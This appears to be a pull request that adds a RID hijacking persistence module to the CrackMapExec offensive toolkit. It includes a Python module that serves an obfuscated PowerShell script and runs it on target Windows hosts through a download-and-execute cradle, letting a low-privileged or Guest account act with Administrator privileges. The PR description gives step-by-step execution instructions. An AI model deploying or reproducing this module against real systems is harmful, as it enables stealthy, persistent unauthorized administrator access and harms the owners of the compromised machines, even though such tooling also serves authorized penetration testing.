### PR TITLE
Add RID Hijacking Persistence Module

### DIFF
--- a/.gitmodules
+++ b/.gitmodules
@@ -34,3 +34,6 @@
 [submodule "cme/thirdparty/pywinrm"]
 	path = cme/thirdparty/pywinrm
 	url = https://github.com/diyan/pywinrm
+[submodule "cme/data/RID-Hijacking"]
+	path = cme/data/RID-Hijacking
+	url = https://github.com/r4wd3r/RID-Hijacking.git

--- a/MANIFEST.in
+++ b/MANIFEST.in
@@ -16,6 +16,8 @@ prune cme/data/powersploit/Recon/Dictionaries
 prune cme/data/invoke-vnc/vncdll
 prune cme/data/invoke-vnc/winvnc
 prune cme/data/invoke-vnc/ReflectiveDLLInjection
+prune cme/data/RID-Hijacking/modules
+prune cme/data/RID-Hijacking/slides
 recursive-exclude cme/data/invoke-vnc *.py *.bat *.msbuild *.sln pebytes.ps1
 prune cme/data/netripper/DLL
 prune cme/data/netripper/Metasploit

--- a/README.md
+++ b/README.md
@@ -32,7 +32,7 @@ This repository contains the following repositories as submodules:
 - [RandomPS-Scripts](https://github.com/xorrior/RandomPS-Scripts)
 - [SessionGopher](https://github.com/fireeye/SessionGopher)
 - [Mimipenguin](https://github.com/huntergregal/mimipenguin)
-
+- [RID-Hijacking](https://github.com/r4wd3r/RID-Hijacking)
 # Documentation, Tutorials, Examples
 See the project's [wiki](https://github.com/byt3bl33d3r/CrackMapExec/wiki) for documentation and usage examples
 

--- a/README.rst
+++ b/README.rst
@@ -32,7 +32,8 @@ This repository contains the following repositories as submodules: -
 - `Invoke-Vnc <https://github.com/artkond/Invoke-Vnc>`__ -
 `Mimikittenz <https://github.com/putterpanda/mimikittenz>`__ -
 `NetRipper <https://github.com/NytroRST/NetRipper>`__ -
-`RandomPS-Scripts <https://github.com/xorrior/RandomPS-Scripts>`__
+`RandomPS-Scripts <https://github.com/xorrior/RandomPS-Scripts>`__ -
+`RID-Hijacking <https://github.com/r4wd3r/RID-Hijacking>`
 
 Documentation, Tutorials, Examples
 ==================================

--- a/cme/modules/rid_hijack.py
+++ b/cme/modules/rid_hijack.py
@@ -1,0 +1,89 @@
+from cme.helpers.powershell import *
+from cme.helpers.logger import write_log, highlight
+from datetime import datetime
+from StringIO import StringIO
+import re
+
+class CMEModule:
+    '''
+        Executes Invoke-RIDhijacking.ps1 allowing to set desired privileges to an existent local account by modifying the Relative Identifier value copy used to create the access token
+        Module by Sebastian Castro @r4wd3r
+    '''
+
+    name = 'rid_hijack'
+    description = "Executes the RID hijacking persistence hook."
+    supported_protocols = ['smb', 'mssql']
+    opsec_safe = True
+    multiple_hosts = True
+
+    def options(self, context, module_options):
+        '''
+            RID             RID to set to the specified account. Default 500.
+            USER            User to set the defined RID.
+            USEGUEST        Boolean. Set the defined RID to the Guest account.
+            PASSWORD        Password to set to the defined account.
+            ENABLE          Boolean. Enable the defined account.
+        '''
+
+        self.rid = 500
+        self.user = None
+        self.password = None
+        self.useguest = False
+        self.enable = False
+        
+        if 'RID' in module_options:
+            self.rid = int(module_options['RID'])
+        if 'USER' in module_options:
+            self.user = str(module_options['USER'])
+        if 'PASSWORD' in module_options:
+            self.password = str(module_options['PASSWORD'])
+        if 'USEGUEST' in module_options:
+            self.useguest = True
+        if 'ENABLE' in module_options:
+            self.enable = True
+
+        self.ps_script1 = obfs_ps_script('RID-Hijacking/Invoke-RIDHijacking.ps1')
+
+    def on_admin_login(self, context, connection):
+        command = 'Invoke-RIDHijacking'
+        command += ' -RID ' + str(self.rid)
+        if self.user:
+            command += ' -User ' + self.user
+        if self.password:
+            command += ' -Password ' + self.password
+        if self.useguest:
+            command += ' -UseGuest '
+        if self.enable:
+            command += ' -Enable '
+
+        launcher = gen_ps_iex_cradle(context, 'Invoke-RIDHijacking.ps1', command)
+        connection.ps_execute(launcher)
+        context.log.success('Executed launcher')
+
+    def on_request(self, context, request):
+        if 'Invoke-RIDHijacking.ps1' == request.path[1:]:
+            request.send_response(200)
+            request.end_headers()
+
+            request.wfile.write(self.ps_script1)
+
+        else:
+            request.send_response(404)
+            request.end_headers()
+
+    def on_response(self, context, response):
+        response.send_response(200)
+        response.end_headers()
+        length = int(response.headers.getheader('content-length'))
+        data = response.rfile.read(length)
+
+        response.stop_tracking_host()
+
+        if len(data):
+            context.log.success('Invoke-RIDHijacking executed successfully')
+            buf = StringIO(data.strip()).readlines()
+
+            for line in buf:
+                output = filter(None, re.split(r'(?:\s*\[.\]\s)', line.strip()))
+                for o in output:
+                    context.log.highlight(o)


### PR DESCRIPTION
## Overview

The **RID Hijacking** hook, applicable to all Windows versions, allows setting desired privileges to an existent account in a stealthy manner by modifying some security attributes of an user.

By only using OS resources, it is possible to replace the RID of an user right before the access token is created. Taking advantage of some Windows Local Users Management integrity issues, this module will allow to authenticate with one known account credentials (like GUEST account), and access with the privileges of another existing account (like ADMINISTRATOR account), even if the spoofed account is disabled.

## Module Testing
The module `Invoke-RIDHijacking` is compatible with Powershell >=2.0. It requires administrative privileges to be executed. 

This module has been tested against:

- Windows XP, 2003. (32 bits)
- Windows 8.1 Pro. (64 bits)
- Windows 10. (64 bits)
- Windows Server 2012. (64 bits)

## Module options

![cme_module_options](https://user-images.githubusercontent.com/14118912/53310153-985de780-3879-11e9-9d64-444bec528231.PNG)

## Execution

1. Authenticate with the _unprivileged_ local user account. Login success but without privileges.
2. Set the _Administrator built-in_ account default **RID (500)** to the _unprivileged_ local user account
3. Authenticate again with _unprivileged_ local user account. Now it has _Administrator_ privileges.

![cme_demo](https://user-images.githubusercontent.com/14118912/53310164-a6ac0380-3879-11e9-91e5-9e198e998d21.PNG)

## References
https://github.com/r4wd3r/RID-Hijacking
https://csl.com.co/rid-hijacking/
https://r4wsecurity.blogspot.com/2017/12/rid-hijacking-maintaining-access-on.html

